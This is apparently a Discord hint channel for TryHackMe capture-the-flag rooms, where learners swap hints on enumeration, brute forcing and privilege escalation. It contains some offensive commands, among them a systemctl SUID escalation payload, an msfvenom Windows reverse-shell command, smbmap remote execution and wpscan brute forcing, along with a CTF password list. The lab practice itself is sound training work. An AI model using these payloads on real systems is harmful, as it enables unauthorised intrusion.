#room-hints
dude the skynet box makes me want to go watch T2 lol
CC: Pen Testing smbmap ipconfig = smbmap -u'admin' -p'password' -h 10.10.10.10 -x 'ipconfig' please help
I don’t see a question
task 20 in last
The priv esc for skynet is crazy..thankfully for google or else I would never have figured that out... on to the next!
Hi All, just need some pointers. I'm bogged down in the Cross-Site Scripting Room. Task 4 #1. Craft a reflected XSS payload that will cause a popup saying "Hello". I've tried the script alert statement but I'm told to think again. Please help?
@iron swan space, quotes, go figure
How good is waiting for hydra to crack things.
For THM rooms, you should not be waiting for too long. ~15 minutes is enough I guess
Hi
Is anybody able to help with a problem I'm having executing the PowerUp script for the Steel Mountain room please?
I can upload the script and start powershell, but when I try and execute the script nothing happens
I can't figure out what I'm doing wrong at all, any hints would be much appreciated
I start off with the "PS >" prompt
but when I try "PS >. .\PowerUp.ps1" then I move to a new line without the "PS >" prompt
Really not sure what I'm doing wrong here
Seem to have killed the conversation in here too
just like my PS session
@keen flume im not sure but maybe powershell is restricted to run some files
It’s sometimes difficult to upgrade to powershell on boxes
Try running it without dropping into a powershell shell
hi..
i'm trying to do the learn linux challenge and on task 18, i don't understand what he wants in the second "What is the value of the home environment variable"
what i need to do?
Get the value of the home environment variable
Make sure you've swapped users like you're meant to
@stuck fractal what does that mean? switch to user?
You have the password for shiba2 by now, correct?
@stuck fractal aehh no.. because i'm returning to this challenge after 2 weeks or more
then switch to shiba2?
You're meant to, by this task. At least I'm fairly sure.
do you remember what the password to shiba2 is?
I'm not going to tell you it.
If you've completed the task, you entered it into an answer box on TryHackMe
Look back at the section for the first binary
yeah yeah i'm looking back
then now i need to do echo $home and find the answer?
or to look inside in some folder?
a little bit of help with the file upload room?
i figure the task
hey, need help for Vulnversity : https://tryhackme.com/room/vulnversity, idk if i need to put this || TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF || in a text file or if i can put it in the shell
oh ye sry, task 5 #2
I need help in SESH Birthday CTF I stuck at killswitch flag can't understand how to get flag
I also know i need to modify the command
ok, but i have another problem, i just don't really know what the command is doing
|| i know i can execute a command with the root permissions but idk where i need to put the /root/root.txt in the command ||
have you gotten the contents of the /root/root.txt already?
no
if you have root permissions you can run cat /root/root.txt to get the contents
the content is the flag you are looking for
i don't have it, i need to get root with || systemctl exploit and read the root.txt flag||
yup
and you just typed out the whole exploit previously in your first question
once you copy and paste the few lines you can run whoami
you should be root
ye, but someone told me i need to change something in the command
why dont you try it out first
without changing anything
pretty sure i did not change anything when i tried that exploit
try running whoami
i'm still || www-data ||
Those last two lines are wrong
Anyone know what this might mean?
I think its port knocking, but I don't know what to do after..
https://tryhackme.com/room/theblobblog
Enumeration
{REDACTED}
Can you wait 1 more day till we ask for hints on the room please?
I’ll release writeups tomorrow then you can ask away
Sorry! Thought it was a 10 day waiting period
In the meantime you can DM for hints if you want
The room was released on Wednesday (I know a bit confusing cuz the created date is wrong rn)
hi all I'm stuck at "windows forensics" point #11 .....someone could give me a hint? thanks
hm someone a hint for golden eye task 2 #3 ? it feels like not the obvious answer, no clue what i am messing up. i even connected to the service and got all the data from it
Hey in the blog log room I decoded both the msg tried bruteforcing SSH looked for more open ports still couldn't find something am I missing something?
@eternal brook Can you please wait one more day, as the creator stated above? It's a brand new room
yeah that is confusing, i think when kiba was listed as new on dashboard, it also showed a higher number, now it shows 8 days or so
can i pm you? @oblique cliff
Yes but I’m going to doggo park so won’t answer for a bit
guys in the linux challenge room, i somehow managed to download flag32.mp3 but i can't listen to it
what do i do?
Copy it onto a machine where you can listen to it?
like my own machine?
That works
how can i do that can you teach me
Copying files from place to place is fairly fundamental
I'm certain you can find out how with some research
okay thanks :)
Guys any help with TheBlobBlog ?
Kinda stuck
Still a new box, give it another day please?
Not even hints ? I hit a dead end.
puttygen newkey -O private-sshcom -o newkey.puttygen-sshcom
what does*** private-sshcom*** mean here ?
Thanks Buddy
Can anyone give me a hint on Tartarus? ||I found the user list and password list in the hidden directory, but I was unable to use hydra to log into ssh or ftp with them so now I'm not sure what to try||
login hydra for ssh mmmm
@valid elbow have you “gobustered” hard enough?
i went to the end of the kali medium size list, I guess I can always gobust some more. There's something on port 80 im missing then?
You won’t find it in a wordlist
I don’t know how much of a hint you want but you may need to pay really close attention
Because you’ve definitely missed something.
Does anyone have the flag for the new OWASP Juice Shop task 7.2? I've gotten the XSS to work a dozen different ways but the flag won't pop.
I am at OWASP Top 10 Task 21 #2 and I get the XSS to say hello but it appears to be wrong for the answer
What payload are you using?
I got it.. I used " instead of '' or whatever char it was I copied the example and tried to use an edited version
👍
It should be on the web page just keep looking
i looked up in writeups but they also didn't mention anything about flag3
nvm
got it
it was in front of my eyes this whole time
On first page you open 😄
and as per the question, it doesn't need to be cracked, its just written there, i think its for confusing peeps,
nah i had to go to other port
I forgot there is another port 😄
Help with BlobBlog yet ?
Wait one more day.
Why is this taking ~13 hours
my only thought is because it's being run on a vm, but even then..
It took me less than 5 mins it shouldn't take that long
See, that's what I mean. I dunno why it's taking forever.
What wordlist did you use?
fsocity
|| wpscan --url http://robot/wp-login -U elliot -P mrrobot/fsocity.dic -t 150 || That's the command I'm using now.
We'll see.
I'm gonna assume it's gonna be something to do with the fact I'm using a vm tho
how many cores are you using and how much memory are you using
memory is 4GB, core is set to 4.
okay
which is literally half of my actual machine.
good
I'm almost tempted to bump it up to 6 cores, and 6GB of RAM tbh.
because my windows is used for discord, and occasionally youtube when I'm waiting for things to happen
okay good luck
Should I enable AMD-V and/or PAE/NX?
no idea
i'm just gonna play around and see.
@dusk imp which room is it?
mrrobot
I'm doing what Esqy suggested and using the browser based attack machine to see if it's just my vm being silly
@dusk imp it’s almost certainly because you left duplicates in the dictionary

|| I don't know if I should have favourites, but you are one of my favourites. ||
Hahaha.
I didn't want to upset the others. 😛
||we don’t worry about the others 😘||
Hahahaha.
@oblique cliff
It was absolutely the dups.
how didn't I notice the dups previously though, silly me
😄
how in the world did you do the room with a duplicated dic?
I didn’t I saw it was gonna take 13 hours was like there’s no way that’s right and peeked at a walkthrough haha
Yep, that scan you showed would’ve been halfway done already haha
it just finished.
It worked I hope?
Negative @oblique cliff
Show syntax 🤔
Is it for root?
yes
As a spoiler what do you think the password should be
||securepassword123||
Huh that should work
Uhhh reboot the box?
I haven’t done that room so I’m not really sure unfortunately
It's not the root password
@crystal glade anyways thanks i fixed it
👍
Hi. 🙂
Jack – root: I’ve found a family of writable files that match the hint.
My initial thought was looking for SUIDs or cronjobs that involve p——n. Crontab seems “empty” and suid3num tagged all the SUIDs as common.
Tried pgrep to see if there are other services that may call p——n but am not sure what to look for.
Blog posts discuss finding writable files but assume SUID or timers for execution.
Try again? Try differently? Try smarter? 🙂
Haven't done that room so this may not be relevant but something I always look out for are import statements and the locations (and order) in which the interpreter searches for the modules
@edgy aurora
Do you know any ways of listing root-jobs that utilize p——-n? I’ve found scripts owned by root and have plenty of ways to tamper with the modules. Just not finding a timed binary or script that will ultimately call a module.
Hello, I need a hint in the c4ptur3-th3-fl4g room. task 2 question 1. I don't know how to get the message from the audio wav file. I have opened it in audacity but don't know what to do with it. Also there are no writeups talking about it.
linpeas would probably find anything relevant if you haven't already run it @narrow wren
@terse kiln you're probably looking at the waveform by default in Audacity, try to find a spectrogram view in the program and see what it looks like
Learning Linux #43 - The True Ending. I am at the very last part and have found the correct user to open the secret file. But I do not know the password. We were given all the other users' passwords in the tutorial, but not the one I need. Is there something simple I am missing here?
@spiral yew
“Everything you need is on this page.” 🙂 Was there something there you may have overlooked the last time?
I just found it. It was not on that page, lol.
@spiral yew Congrats. 🙂 I remember finding the clue on the page, but you had to blink twice and re-read everything.
There is something there that points you toward how to find it. 🙂 Flew right over my head while I was doing the tasks.
It’s a thing some box-devs do to test your attention to detail. I did another box where a password was written inside a paragraph on the first page you see, and I totally missed it.
@narrow wren pspy can catch cron jobs
@stuck fractal Thanks, will check it out.
Assuming you've checked the global crontab, right?
Yup
For the life of me, I can't seem to see what the correct error is for the burpsuite room
Any help getting to the right direction will be very much appreciated
@bleak arrow where is the closing curly brace
in ur request
Also missing a comma separating the fields?
in ur request
@dense violet
I didn't think before deleting all that.. Guess I just need to start it over
@bleak arrow nah just put the ',' and the '}'
{ "email" :"'", "password":"'"}
@dense violet
Thanks
@stuck fractal Rooted. Thanks for the hint. 🙂 Pspy is awesome.
Sweet, glad it helped
anybody working on "jacob the boss" root part ?
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
@obsidian fog as that's a very new room, please wait a couple days before asking for help or hints
NP, thank!
Burp suite task 13 hint please. Anyone? 🙏
Which question?
Both can be solved by reading the report
No shortcuts there, you have to actually read it
Both questions tbh lulzz
By reading? Oops then let me read again
Ah thanks so much 🙏 I’m finally Burped 🥳🥳🥳
Anyone available that can help with the new Juice Shop?
Jacob the boss... got the user flag, but this priv esc is driving me a little up the wall. I feel like I've tried to do it the right way, but messed up something small.
Not asking for hints, just stating it's a good box lol
!rule 13
There's #522158404614225920 for that
hints on root for jacob the boss
Hey, as that's a brand new room please wait a couple days before asking for help or hints @nocturne relic
k
Room CC: Pen Testing > Task 4 > Gobuster
When I tried to man gobuster
I get nothing > just saying that no manual entry for gobuster
How to solve this?
lol so I'm working through the Linux Challenges room.
I've run into the ultimate in vague instructions.
"Find the difference between two script files to find flag..."
obvs the diff command, but which two script files...? or am I missing something?
I'm missing something. nvm.
How to solve this?
Nevermind solved it
What show does Jim reference in his review?
in OWASP Juice Shop
Have you looked at Jim's reviews?
Hello everyone, I just i need help. How can i fix this ? im at PS EMPIRE room but i cant run the empire --- FIXED 😄
Nevermind guys I fixed it myself 😄
Hello guys, can someone give me a hint about privilege escalation in this new box called Jacob the boss?
!rule 13
is hint available now for the blob blog room??
You didn’t find any weird or out of place files during your enumeration
blogFeedback
Ghidra it is 🙂
kkk thanks for the hint
trying to crack a hash with hashcat, can i get a hand
any hint for Theseus foothold.
pretty sure @limber bane said no hints will be given for that box
@oblique cliff on my ... ever ?
thought, it's been a while since the box release so it's ok to ask now.
I need some help in the privilege escalation part of the room "Retro", I am currently user "nt authority /iusr".
I've tried the following:
- OS Version exploits
- Searching for weird services/scheduled tasks/software, the only one mildly suspicious being google chrome, but I couldn't do anything like finding password stores as my current user does not give access to the other users.
- Check the powershell history
- Check for unattended files
- Check for weird files/passwords stored in files...
- Check unquoted service paths
- Check for stored credentials with cmdkey /list
- Check for AlwaysInstallElevated privilege
- Check passwords in registry
- Check for the web server logs (no access)
- Check local services not exposed to the "world", only found smb without any shares, mysql, and some other service I can't identify. (can't reverse tunnel it as I don't have the current user password).
- Found the SeImpersonatePrivilege enabled but unsuccessfully exploited it.
- Check for weird permissions on folders & files.
Im kinda running out of ideas, my best lead is the SeImpersonatePrivilege, the weird local service on port 5985 and Google Chrome. I couldn't successfully exploit any of those.
@white salmon check the pin in #room-help it shows what you should've found in the browser history
so in advent of cyber room task 22 day 17 (hydra-ha-ha-haa) i tried bruteforce by hydra with rockyou wordlist.. but still not able to get inside.. as per the hint the password would be from the first 30 words in the list, even tried manual bruteforcing but i am not able to go through, please check it once
any help for upgrading the initial shell in jacktheboss? tried a bunch but no luck
As that's still a new room, please don't ask for help or hints just yet @nocturne vault
gotcha
@stuck fractal please help me
Sorry, I don't help people when they beg like that. We're all volunteers. I help people at my own pace.
sorry for my mistake, i would be more careful next time @stuck fractal
you don’t need to ping him he is always watching 😄
@oblique cliff couldn't find the pin you mean, but im giving up and checking the write-ups im too dumb for this room
💀
No you did Blob
hummmmm thanks I'll check it out but im not on task 3 stuck
privilege escalation from the initial shell
Bob
what the heck am i thinking of
Literally told you what you need for priv esc
Im kinda confused
What task are you on
ok I'll check it out xD
not Bob
I am Jabba :3
Which question sorry?
its not a question
I am user nt authority /iusr, the user I suppose is wade
I don't have access to the wade user
Wait what room are you on 
retro
OHHHH
And you are NT authority
Help pls I haven’t
haha ok, how did you get an initial shell on the system?
logged in with the wordpress user wade, edited the 404.php
with a php windows reverse shell
ok thats actually kinda hilarious cuz thats completely unintended
not to worry you can still do the box
How about ||reusing those creds||?
@oblique cliff 
hummmmmmmmmmmmmm
he can still do the box like he is now
@oblique cliff yes but ezpz
james stop, its just as ezpz this way
been enumerating it for quite some time
windows server 2016 standard 10.0.14393 n/a build 14393
did you run anything like windows exploit suggester, sherlock,etc
I had to do manual enumeration cause the machine was constantly breaking
with powerup and winpeas
did you do windows exploit suggester
winpeas and power up dont show kernel exploits i dont think
i dont know whats that
which is what youre going to want
Ill check it out
thanks a lot I think I can do something now, I tried searching for the version exploit but didnt find anything,
kek
🙂
Guys need help Linux challenge flag15 any clues ? or hint except for *release
That's a valid file glob
i found 2 look a like flag hash in 4.4.0-75 and 72 but it was not the flag lol
Look up shell globbing
Ok thanks ill research about that 😄
Using nmap - what is the fastest way to scan for open TCP ports 1 - 65535? I only want what ports are opened, no details on the services, OS, or anything. I tried doing a syn scan -sS T4 but it takes forever.
(Masscan is quick but I noticed it misses ports sometimes)
rustscan
65k ports in 39 seconds, it scans the ports then pipes it to nmap and uses the flags for service detection etc.
Thanks, looks interesting. Was hoping I could use nmap though
(I think it stopped using -A?)
If you want to use nmap and only nmap I'd suggest you doing nmap -T4 <IP> then whatever you get do nmap -A -p<listports>
Not sure but it will still cover the required things so 🤷♂️
@trim haven But this is basically what rustscan does, just slower.
Ok great! thank you!
doing CC pentesting, on the first part where you have to get user/root on the box, found the open ports, scanned port 80 with gobuster didn't find a foothold even though there's supposed to be a file with creds on it
Scan with extensions, try different wordlists, try recursive if you find dirs
found ||/secret/|| directory but using curl/burp suite there's nothing there, in the walk-through there's supposed to be ||creds|| I have also tried terminating and starting a new VM
So, you found a dir. Why not use gobuster on that dir to see if you can find anything in there? Curl just acts like a browser, not much point here
In task 10 of the burpsuite room I should look for a response which issues a cookie but I can’t find it. I have done the room like 5 times over now but stuck. Can someone give a hint?
@white salmon Make sure you're looking at responses
And you want a Set-Cookie header
@stuck fractal thanks!!! I feel so stupid now but finally progress
The analyse can be a bit buggy btw, but that's a burp thing
Hey I was trying to complete the CC: Pen Testing room by paradox
In the 4th task (web enumeration using gobuster)
Should i be using common.txt?
You can use any list found in the directory busting directory default on kali and it should do the trick
🥳
Can someone point me in the right direction for the privilege escalation in jacobtheboss?
I haven't found anything out of the ordinary yet, ||dirtycow seems patched|| and I didn't notice anything special in linpeas' output.
I'm currently cracking away at jacobs password hash from the cms to see if I can use that somehow.
!rule 13
New room wait a bit for hints please
Huh, go figure, didn't notice that. How long is a box considered new?
Until the room decided explicitly says or a few days like 3/4 days
The # days old in the room is wrong rn
Will be fixed
It was released like 2 days ago iirc
Jk released yesterday
can anybody give me a gentle nudge with CC: Ghidra room im stuck on the very last question. I don't understand what they are asking for.
[Task 6] Final Exam
You should now be able to competently analyze a binary. Now is the chance to show your skills with this crackme! The final exam is the binary called final_exam.
#1
What outputs the good job message?
the decompiler shows printf outputs the good job!!! message but thats not the correct answer
They’re asking for what input into the binary will cause the binary to display that message
do i need to somehow extract "the binary called final_exam." from the downloaded a.out file to find the correct answer?
No you run the binary with the proper input and it’ll print out that line
That make sense?
It’s basically just asking what’s the password
Hey, I'm on the Intro to x86-64 room and I've been banging my head for about 3h on the crackme2 [task 7]. I found that the crackme2 executable read the content of ||/home/tryhackme/install-files/secret.txt||, but the content of it (||"vs3curepwd"||) is not the answer. I know I am missing something so could you give me a hint please? @me if you reply to this message
Hey, Im doing CC: Pen Testing to refresh and im on this question.
What is the name of the hidden file with the extension xxa
I have tried using the common.txt wordlist and haven't come up with anything
Make sure you're looking on /
@long oak depends how big of a hint:
small-ish: ||put breakpoints everywhere and see what the binary is doing to your input||
big: ||take the hint given in the room literally||
Greetings! I need a nudge on the box 'Relevant' .. I found some loot but when I try to authenticate with what I found it gets me nowhere.. if you want to give me a nudge or small clue DM me please
I see a write up but don't want to go through it yet
We can chat here.
my last guess was to use wireshark for maybe a clue on the wire
Keep in mind that I built the challenge to force you to know when to quit and try another approach.
ok ill keep thinking
So having found what you have, and seeing as you continue to get nowhere with it ||as intended||, make sure to go back to your scan and check those results.
If you did a basic scan, consider a full port scan.
nmap -p- 10.10.166.31 T4 -Pn
nmap -A -T4 -p 80,135,139,3389,49663,49666,49668 10.10.166.31 -Pn
Those are the scans I ran
That's all you need. 🙂
ok ill read back over my results
Enumerate everything, not just what appears to be obvious.
If you need any more help please feel free to ask. I'll be around for a bit longer tonight.
ok cool
So when trying to use rockyou.txt with john i get a bunch of warnings and the password doesn't actually crack. https://puu.sh/GqlY9/c5777da4f5.png
it does crack if you give it time
But you're not specifying the wordlist correctly
If you identify the hash and declare it with the --format flag, it will probably be faster as well.
--wordlist= or -w=. No spaces allowed.
evening everyone, any hints on a wordlist to use for the brute force wps attack? Trying to run rockyou against 3 users is taking forever...
@silent trellis Room, task, question?
sorry my bad... this is for the Jack room
If that's taking ages, why not try a shorter wordlist first?
@stuck fractal started trying to run the xato ones as well, but up to the 10k list already and not having luck.
Fasttrack is nice and short
thank you I'll give that one a shot
I noticed relevant sometimes closes its ports on me after a while.
Maybe thats from me scanning against it too much?
You may be knocking a service down if you are trying to scan it too quickly.
ok
one thing i noticed is that I can make a connection to the httpapi port 49663 using ftp, netcat, etc.. but doesn't do much
What else have you tried with that port?
tried to hit it via web browser
Have you checked for subdirectories?
yeah..
Did you find anything?
interesting.. ok.. yeah that makes sense.
thanks i will roll with this and see how far i can get!
An IIS webserver can have multiple sites as long as they are listening on different ports, therefore directories may exist behind each port. Gotta remember that for next time
🙂
My brain didn't click that once I tried to hit it via web browser on 49663 and saw the default IIS lol
I just stopped
Fowsniff CTF - has anybody used the python3 reverse shell into ||cube.sh||?
is it allowed to ask for a hint about the room ||Jacob The Boss|| ?
!rule 13
stuck on last question for basic pentesting, any hints?
Have you checked the Hint?
found /usr/bin/vim.basic had root perms so just gave jan root and cat pass.bak
Yes
Have you done the metasploit room?
No...
Maybe try doing that so you can understand how to use metasploit :)
@dire zinc Have you found any suspicious files?
i got it using vim.basic
Okie dokie
Hey guys im struggling with the owasp top 10 room, day 8, the rce remote execution, I have altered the encoded payload in the cookie, refreshed but Netcat isn't capturing anything, tried a few times
@sullen seal I just did that one yesterday and it worked fine by following the hints/walkthrough. Did you make sure you followed closely, like only copying the base64 between the ' ' from the python output? I'm guessing it's something small like that
Otherwise I'm not sure, sorry
Thanks that was my thought but I have been through it a few times following closely, I'm not using Kali for my linux machine so maybe there are differences there
@patent token should one of these two lists do the trick for the http directory brute force?
directory-list-2.3-medium.txt
directory-list-2.3-big.txt
any hint for PE at jacob the boss?
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
Sounds good
I have tried everything man, I know the rules
if you know the rules why are you asking?
it's not a matter of being stuck, it's a matter of respecting the room creator
Jo2020, 2.3-medium is good
Suitguy has asked that no hints are given at any time for Theseus
Any hints on Year of the Rabbit room? I'm getting rick rolled. 🥺
@white salmon
ty
how in the world do I get LinEnum to allow me to easily read through it without cutting off half the console
more doesn't work. 😦
Pipe into a file, up your terminal scrollback, more or less should work
burp suite
Alright, let me take a look thanks.
Hey guys. I'm trying to bruteforce an internal service on Internal, but it's taking a long time. Is the password in rockyou.txt?
any hints for the Alice in Wonderland teaParty file?
When viewing search results, it's often useful to rename fields using user-provided tables of values. What command do we include within a search to do this?
I have an idea what it is but it won't accept it...
@hollow fox do you still need a hint
Is it just me or the flag in owasp juice shop is not working lol
Probably just you
Well, a notification "You successfully solved a challenge" popped up and I just copied the flag and it says it's incorrect
Here is a picture
so it's not a real flag?
it is a real flag but not the flag you need
Ok thanks 😄 love u guys
was like you, searching for another flag for 2 hours lol
lol I just figured I needed to put ' or 1=1-- not choosing one lol
I thought I needed to choose only 1 haha xD
what have you tried?
gobuster on dirs and found a few containing some sentences but that's about it
have you found a login page?
found wp login and /admin which just keeps reloading the screen
in robots.txt you have a dict file, and you have a wp-login page
but no user?
I'm not sure, but I think WordPress says when your user isn't valid
so I think you can try to use wpscan or hydra to brute force users
so brute force users and dic attack password
Brute force user first
Hi, I've been stuck with flag 16 from Linux Challenges for quite some time. This flag is in a mounted file and I guess that I have to unmount it (once I find it) to get the flag. I used ||findmnt and mount commands|| to look for it but still nothing. What am I missing?
you need to search your mnt folder
hi
its connected
Hi guys, I am in the OWASP room, I am stuck in task number 7
Which subject
i can't execute any cmd
@quartz ruin type whoami
what was your msfvenom payload
msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.14.1.44 LPORT=1337 -f aspx -o rev.aspx
@white salmon My /mnt has nothing in it. Isn't this the folder?
there are several places that mounts go
@quartz ruin pretty sure staged payloads have to be caught with a metasploit multi/handler. Either do that, or use an unstaged payload
@quartz ruin you didn't set the correct payload
it needs to match your msfvenom payload
here
look at your payload in metasploit and your payload from msfvenom
my man, you're still trying to catch a staged payload with netcat
just generate an unstaged payload
windows/shell_reverse_tcp
also take a break and sleep
everyone needs sleep
even Blobs
Need hints on Year of the Rabbit room. ||So far, tried directory busting, anonymous FTP, analysed with Burp and found out about listening to the video, and then in the video it says I'm in the wrong place.||
navigate around and intercept every request with burp
particularly when they try to rick roll you
||This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet! Make sure your audio is turned up!||
Got this thing.
the other time they rick roll you lol
How many times they gonna rick roll me lol?
i think just 2 🤔
||One in assets and one in style sheet?||
theres somewhere where ||they redirect you to youtube to rickroll||
did you hit that yet
Yup. ||On style sheet theres a hidden path.||
@trim haven yes pls
@hollow fox have you tried checking the code for the executable?
Let me check.
No
Check away
can you find it on the machine ?
Same I got this and they are saying to disable js.
Oh, is that a hint?
Still couldn't find anything. Can I get another hint?
yes, but you don't need to do that
||look at the requests that you intercept when you click the link||
@sweet storm huh?
@hollow fox I mean if you’re able to run the file, are you able to download it?
||Now, I'm seeing a hot babe. :)||
lemme think
bc it's in a user directory I do not know the pw for
only was able to execute it through priv esc
If you can’t run it, get to the point where you can run it
@oblique cliff I'm stuck on flag 16 from linux challenges and can't find a suspicious mount file. Can you give me a hint?
media
mounts can be in /mnt /media or /dev (i think)
bc for scp u need the user's pw
@hollow fox scp is not the only way for file transfer
"Ot9RrG7h2~24?\nEh, you've earned this. Username for FTP is ftpuser\nOne of these is the password:\nMou+56n%QK8sr\n1618B0AUshw1M\nA56IpIl%1s02u\nvTFbDzX9&Nmu?\nFfF~sfu^UQZmT\n8FF?iKO27b~V0\nua4W~2-@y7dE$\n3j39aMQQ7xFXT\nWb4--CTc4ww*-\nu6oY9?nHv84D&\n0iBp4W69Gr_Yf\nTS*%miyPsGV54\nC77O3FIy0c0sd\nO14xEhgg0Hxz1\n5dpv#Pr$wqH7F\n1G8Ucoce1+gS5\n0plnI%f0~Jw71\n0kLoLzfhqq8u&\nkS9pn5yiFGj6d\nzeff4#!b5Ib_n\nrNT4E4SHDGBkl\nKKH5zy23+S0@B\n3r6PHtM4NzJjE\ngm0!!EC1A0I2?\nHPHr!j00RaDEi\n7N+J9BYSp4uaY\nPYKt-ebvtmWoC\n3TN%cD_E6zm*s\neo?@c!ly3&=0Z\nnR8&FXz$ZPelN\neE4Mu53UkKHx#\n86?004F9!o49d\nSNGY0JjA5@0EE\ntrm64++JZ7R6E\n3zJuGL~8KmiK^\nCR-ItthsH%9du\nyP9kft386bB8G\nA-*eE3L@!4W5o\nGoM^$82l&GA5D\n1t$4$g$I+V_BH\n0XxpTd90Vt8OL\nj0CN?Z#8Bp69_\nG#h~9@5E5QA5l\nDRWNM7auXF7@j\nFw!if_=kk7Oqz\n92d5r$uyw!vaE\nc-AA7a2u!W2*?\nzy8z3kBi#2e36\nJ5%2Hn+7I6QLt\ngL$2fmgnq8vI*\nEtb?i?Kj4R=QM\n7CabD7kwY7=ri\n4uaIRX~-cY6K4\nkY1oxscv4EB2d\nk32?3^x1ex7#o\nep4IPQ_=ku@V8\ntQxFJ909rd1y2\n5L6kpPR5E2Msn\n65NX66Wv~oFP2\nLRAQ@zcBphn!1\nV4bt3*58Z32Xe\nki^t!+uqB?DyI\n5iez1wGXKfPKQ\nnJ90XzX&AnF5v\n7EiMd5!r%=18c\nwYyx6Eq-T^9\#@\nyT2o$2exo~UdW\nZuI-8!JyI6iRS\nPTKM6RsLWZ1&^\n3O$oC~%XUlRO@\nKW3fjzWpUGHSW\nnTzl5f=9eS&*W\nWS9x0ZF=x1%8z\nSr4*E4NT5fOhS\nhLR3xQV*gHYuC\n4P3QgF5kflszS\nNIZ2D%d58*v@R\n0rJ7p%6Axm05K\n94rU30Zx45z5c\nVi^Qf+u%0*q_S\n1Fvdp&bNl3#&l\nzLH%Ot0Bw&c%9\n" Is this some kind of encoding?
What room is this?
Year of the Rabbit.
oh my lord
Oh ok I forgot how I did that
@oblique cliff Thanks a lot!
Looked almost everywhere except media xD
No worries Blackout.
uh I legitimately don't remember encountering that
Yea me neither
I extracted the data from png using zsteg.
that came out in a really weird format
IIRC there's a link or file and you have to listen to it to help you
it shouldn't be like that
@astral smelt he passed that already
try something a bit simpler to get info from a file @wintry yarrow
Oh ok yea that room took me a while because of the rabbit holes that's probably why I forgot about it
Oh.
Have you got the name of the picture
||ftpuser|| is the username right?
yea
I tried strings now and got the username.
@wintry yarrow what do you get when you do this on the picture?
that should give you everything you need
yea that gives you the list of possible passwords
also spoiler please
those are all possible passwords
do a little brute force action
When you cat or use strings on the file there are some that are the same, but on two lines there is a potential password for the user. You have to use ||sed|| with those two lines
||Got the password with Hydra.|| I don't know how to use sed, I'll look into that, thanks.
Yup, just got logged in.
there is a file with creds did you get them?
Yup, I got them. I'm pretty confident I can get root now. Thank you for your help.
im confident in you as well
you have the collective knowledge of #blobgang behind you 😤
I am stuck on this question, anyone who can help me a little bit?
I performed the same steps but it's not working
@trim haven I hope its ok to ping you
I managed to get the file onto my local machine, disassembled it and tried to do a bof
but failed
I mean have you tried just doing nano file.name
Hello there, I am stuck at the Kenobi room where I couldn't mount the files of the Kenobi home directory
using this command: mount ip_address:/var /mnt/kenobiNFS replies with this error:
mount: /mnt/kenboiNFS , bad option
Without marking it an executable
I have even used mount.nfs and it doesn't work either
I did cat file > another file ; chmod 777 anotherfile
it runs exactly like it is supposed to
Well if you can manipulate it
You can read the code
If you can read the code
You can understand how it works
wait what ?
@solar lintel mount -t nfs iirc
smth like this is possible ?
James could you assist with this? The room is Wonderland and this user is stuck on the teaParty executable. I’m trying to explain it without giving it away completely but I’m struggling to get my point across.
You can reverse engineer stuff yes
You need to understand what the program does before you can exploit it
Copy it off, throw it into R2 or Ghidra or R2dec or something
what about gdb ?
If you want. But decompiling it and getting C is going to be better for you.
Gonna be easier
ight thanks
@stuck fractal I tried it, although it doesn't work either
Show the full command please
mount -t nfs ip_address:/var /mnt/kenobiNFS
just so I can use the right tool right away: should I use Ghidra or R2
not just for the challenge but in general
That's a question only you can answer
Learn which one you like better
Use that one
ok
@humble cliff burpsuite
how to compile PrintSpoofer.exe
You need visual studio. I'd recommend getting a pre-compiled version
Mayor's GitHub has a compiled one.
I found that this command: ||find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' 2>/dev/null|| solves flag 26 from Linux Challenges. However, I can't understand what it is doing exactly. Can anyone explain to me the reasoning behind this?
match command-line arguments to their help text
in the Attacktive Directory room how long is it going to take to enumerate valid usernames? with kerbrute
been on it more than 20 min now
no valid usernames yet
yes
show pic of the syntax you used
kkk
||./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local Userlist.txt -t 100||
that should finish in like 30 seconds regardless of if it finds anything
can you communicate with the machine?
yes
I think technically the DC name is wrong here
oh, yea it is
||THM-AD||
it should tell you the DC name
@oblique cliff
not bad 🤷♂️
@oblique cliff really lol
look at the enum4linux output again. The DC name will be there. You had the format right before, just wrong name
I know that it is a recent room, but can I have any hints on how to PE the room "Jacob the Boss"? I feel that I have tried everything...
@oblique cliff sure thanks man
Your comment has confused me
I'm not sure if it was a grammatical error or if that is how you meant it.
but I do believe it belongs in feedback :p
yeah sure aha
oh my, I didn't see it was #roomhints, I thought I was talking in General
why are you a slightly disappointed potato? 😦
lets try to make you a satisfied and happy potato!
or, better yet, a tomato!
I can make a list on why I am a slightly disappointed potato
if that will help you feel better then sure 😦
Hey there please help me out here, I am struggling with the find command
zthlinux task 33
We've been through a lot in this section, and the challenge for this binary will reflect that. The first step is actually finding the binary, I'm not heartless though, so I'll give you the name of the binary. The name of the binary is shiba4.
according to me the command should be find / shiba4, but that finds everything, please help
man find
Hey guys 🙂, I'm on the OWASP ZAP room and I'm stuck on one question (my last one): "What does ZAP stand for?" Even if the question is really clear, I don't understand what kind of answer the room expects
after 5 try, I still don't get it ^^
me ?
Mhm
have you tried google?
I want to help you understand, Dragonar
How can I find the RHOSTS for https://tryhackme.com/room/blue
@sullen raptor deploy the machine, it should be in the “machine IP” header
RHOST is the ip of the machine being attacked
oh my b
I understood that ZAP is like Burp Suite, I understood that those tools are a security testing framework and we can use them to test web applications
what I don't understand is what is the exact answer the room expects ^^
Are you aware of what an abbreviation is?
or maybe I don't get something 😒
